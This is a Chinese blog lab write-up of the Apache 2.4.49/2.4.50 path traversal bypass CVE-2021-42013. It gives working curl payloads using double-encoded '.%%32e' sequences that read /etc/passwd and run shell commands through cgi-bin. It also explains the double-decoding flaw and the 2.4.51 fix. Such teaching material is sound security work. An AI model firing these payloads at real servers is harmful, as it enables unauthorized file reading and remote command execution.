中间件漏洞 | Apache-路径穿越升级版

已于 2022-11-02 21:39:20 修改
阅读量481 收藏
点赞数
分类专栏: 中间件漏洞 文章标签: apache
于 2022-11-02 21:39:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/127540082
版权

文章目录

前言

Apache的2.4.29版本的漏洞理解了,那么这个漏洞也很容易理解。

靶场:CVE-2021-42013

1 靶场介绍

Apache HTTP Server 2.4.50 路径穿越漏洞

Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。

该漏洞可以影响Apache HTTP Server 2.4.49以及2.4.50两个版本。

2 漏洞验证 :路径穿越

  1. 编译运行后,查看端口
    在这里插入图片描述

  2. 访问成功
    在这里插入图片描述

  3. curl命令行发送payload

    curl -v --path-as-is http://20.210.90.167:8080/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

url一次解码
curl -v --path-as-is http://20.210.90.167:8080/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd
url二次解码
curl -v --path-as-is http://20.210.90.167:8080/icons/../../../../etc/passwd

  4. 成功读取/etc/passwd在这里插入图片描述

  5. 漏洞原理分析
    函数原理:Apache使用函数 ap_process_request_internal来处理外部请求,先调用 ap_normalize_path函数对字符串进行一次解码,再调用 ap_unescape_url函数对字符串二次解码过滤

    开发为了保险起见,反复解码过滤,但这样反而弄巧成拙,造成二次编码注入。

    %32e --> %2e --> .

%32 = 2
%2e = .
3 漏洞利用:任意命令执行

  1. 命令行

    curl -v --data "echo;whoami" http://20.210.90.167:8080/cgi-bin/.%%32e/.%%32e/.%%32e/.%%32e/bin/sh

    在这里插入图片描述

  2. 抓包
    在这里插入图片描述

4 修复

2.4.51版本中采用了白名单的机制,在ap_normalize_path中加强了对url编码的校验,只允许数字、字母及特定的符号编码,如果是白名单以外的url编码,就直接报错。

c4fx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
weixin_50698958的博客
10-05 266
一、概述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 参考: https://vulhub.org/#/environments/httpd/CVE-2017-15715/ 二、漏洞环境 路径:vulhub/httpd/CVE-2017-15715 启动环境:docker-compose up -d 访.
Apache中间件漏洞复现
mingyqf的博客
02-13 1744
kali复现apache未知扩展名解析漏洞 2. 复现 我上传了一个名字叫shell.php.aaa 的文件,当此特性存在的时候,一看.aaa不认识, 继续解析,.php我认识,解析成php文件了。访问也是同理,比如访问phpinfo.php.qqq可成功显示phpinfo 那么哪些后缀Apache不认识? 不在mime.types当中的都不认识 (Multipurpose Internet Mail Extensions) sudo service apache2 restart cd /etc/apac
Apache中间件漏洞学习
E1even的博客
10-19 3796
Apache HTTPD 换行解析漏洞(CVE-2017-15715) 原理: apache2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略 复现: 首先这里查看index.php <?php if(isset($_FILES['file'])) { $name = basename($_POST['name']); $ext = pathinfo($name,PATHINFO_EXTENSI
Apache HTTPD 换行解析漏洞(CVE-2017-15715) 漏洞复现
鸥鹭忘机
09-30 3887
前言 Apache在2.4.0-2.4.29版本中存在一个解析漏洞。程序在解析PHP时,如果文件名最后有一个换行符x0A,apache依然会将其当成php解析,但是在上传文件时可以成功的绕过黑名单。 如果上传文件的php程序是设置的白名单,那么这个漏洞将无法利用。 漏洞环境 该环境使用vulhub搭建,该漏洞路径为 vulhub/httpd/CVE-2017-15715。进入该漏洞路径后执行一下命令: docker-compose up -d -d 表示后台运行。 注意:该命令必须在漏洞目录下执行,
Apache JMeter (apache-jmeter-5.5.zip)
06-24
Apache JMeter (apache-jmeter-5.5.zip)可用于测试静态和动态资源、Web 动态应用程序的性能。 它可用于模拟服务器、服务器组、网络或对象上的重负载,以测试其强度或分析不同负载类型下的整体性能。 Apache JMeter...
Apache JMeter (apache-jmeter-5.5.tgz)
06-24
Apache JMeter (apache-jmeter-5.5.tgz)可用于测试静态和动态资源、Web 动态应用程序的性能。 它可用于模拟服务器、服务器组、网络或对象上的重负载,以测试其强度或分析不同负载类型下的整体性能。 Apache JMeter...
Apache JMeter (apache-jmeter-5.4.3.zip)
12-31
Apache JMeter (apache-jmeter-5.4.3.zip)可用于测试静态和动态资源、Web 动态应用程序的性能。 它可用于模拟服务器、服务器组、网络或对象上的重负载,以测试其强度或分析不同负载类型下的整体性能。 Apache ...
Apache JMeter (apache-jmeter-5.5_src.tgz 源码)
06-24
Apache JMeter (apache-jmeter-5.5_src.tgz 源码)可用于测试静态和动态资源、Web 动态应用程序的性能。 它可用于模拟服务器、服务器组、网络或对象上的重负载,以测试其强度或分析不同负载类型下的整体性能。 ...
官方网站下载的Apache2.4.29 x64
02-08
应用名称: Apache 2.4.29 x64 发行文件: httpd-2.4.29-o102n-x64-vc14-r2.zip 原始来源: Apache软件基金会 原创主页: http://httpd.apache.org Win64二进制文件: Apache Haus
安全中级3:apache中间件漏洞
weixin_62870380的博客
06-06 1505
运维人员在配置http的默认配置文件的时候,开启了AddHandler application/x-httpd-php .php,虽然限制住了php文件,但是我们可以添加后缀.jpg,只要我们的后缀含有一个php文件就可以解析,没必要是最后一个后缀。我们上传php文件的时候,我们的服务器拒绝上传,但是 apache在配置文件的http.conf的时候开启了SSI(服务器端包含)服务,允许我们的html页面上传shtml文件,而我们的cgi是前端的一个脚本,我们利用他的语法执行任意的命令。
apache 文件上传 (CVE-2017-15715)漏洞复现
weixin_42675091的博客
09-02 1815
apache 文件上传 (CVE-2017-15715)漏洞复现
Apache中间件漏洞深析
weixin_49340699的博客
08-16 291
Apache中间件漏洞深析Apache介绍运行原理介绍apche解析php流程Apache攻击手段换行解析漏洞多后缀解析漏洞SSI远程命令执行漏洞 Apache介绍 Apache是世界使用排名第一的服务器软件。快速可靠可通过简单的API扩充,将Per/Python等解释器编译到服务器中。 目录结构 bin ———————— 用于存放命令工具 如httpd cgi-bin —————— 存放Linux下的常用命令 conf
通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现
Adminxe的博客
09-22 1506
0x00 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。 今天看了好多通达OA的文章,根据护网中出现的一些0day,进行一波分析,其中感觉9hu大佬分析的很到位,然后来以此为基准,一起来看一下这个影响较深的漏洞。然后我自己感觉,出现的漏洞只是表面的一些,其中还有肯定是未公布的,包括我之前在别的版本审..
【文件上传】Apache HTTPD 换行解析漏洞(CVE-2017-15715)
serendipity1130的博客
08-29 388
漏洞分析 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 在Apache httpd 2.4.0至2.4.29中,在<FilesMatch>中指定的表达式可以将“ $”与恶意文件名中的换行符匹配,而不是仅匹配文件名的末尾。 表示配置匹配后缀名文件的防盗链,而这个解析漏洞根本原因就是$ 这个...
Apache HTTPD 换行解析漏洞
weixin_60719780的博客
12-07 1314
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。影响版本:Apache 2.4.0~2.4.29 存在一个解析漏洞;在解析PHP时,将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。我们查看一下配置:读取配置文件,前三行的意思是把以 结尾的文件当成 文件执行。问题就在它使用的是 符号匹配的,我们都知道这个符号在正则表达式中的意思是匹配字符串的末尾,是会匹配换行符的,那么漏洞就这样产生了。 进入容器里,打开index.php,发现如果文件后缀名为 php、
漏洞复现(Vulhub)-Apache HTTPD 换行解析漏洞(CVE-2017-15715)
qq_60848021的博客
09-20 1253
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
Apache Httpd 常见漏洞解析(全)
最新发布
黑战士的博客
02-17 2389
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
简述Apache、Nginx、IIS中间件 存在哪些解析漏洞
03-25
Apache、Nginx、IIS是三种常见的Web服务器中间件。这些中间件在处理网络数据流时都可能出现解析漏洞,下面简述它们可能存在的漏洞: 1. Apache:常见的解析漏洞包括:路径穿越漏洞、HTTP请求拆分漏洞、HTTP请求头注入漏洞、HTTP请求参数污染漏洞等。 2. Nginx:解析漏洞主要包括:路径穿越漏洞、HTTP请求拆分漏洞、缓存欺骗漏洞、SSRF漏洞等。 3. IIS:IIS安全问题比较多,解析漏洞方面包括:目录遍历漏洞、HTTP请求拆分漏洞、HTTP请求头注入漏洞、HTTP请求参数污染漏洞、HTTP响应拆分漏洞等。 需要注意的是,以上漏洞存在于中间件的特定版本和配置,因此在使用时要及时升级和加强安全配置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值